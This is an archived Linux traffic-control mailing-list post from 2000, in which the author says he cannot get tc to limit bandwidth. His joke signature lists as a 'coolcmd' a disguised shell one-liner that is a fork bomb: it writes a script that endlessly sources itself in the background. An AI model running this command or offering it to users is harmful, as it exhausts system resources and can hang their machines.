From mboxrd@z Thu Jan 1 00:00:00 1970 From: Thomas Habets thomas@habets.pp.se Date: Wed, 22 Nov 2000 16:35:04 +0000 Subject: [LARTC] Bandwidth limiting Message-Id: List-Id: References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit To: lartc@vger.kernel.org
(I got this answer from the archives, I have not received it by mail. Odd)

>What doesn't work? Do you get error messages when you run TC or don't you
>know how to use TC?

I don't know how to use TC, which got me to read tutorials and try things for 
hours and hours. Nothing I've tried limits bandwidth.

---------
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "thomas@habets.pp.se" };
  char kernel[]    = { "Linux 2.2" };
  char *pgpKey[]   = { "finger -m thompa@darkface.pp.se" };
  char pgpfinger[] = { "6517 2898 6AED EA2C 1015  DCF0 8E53 B69F 524B B541" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;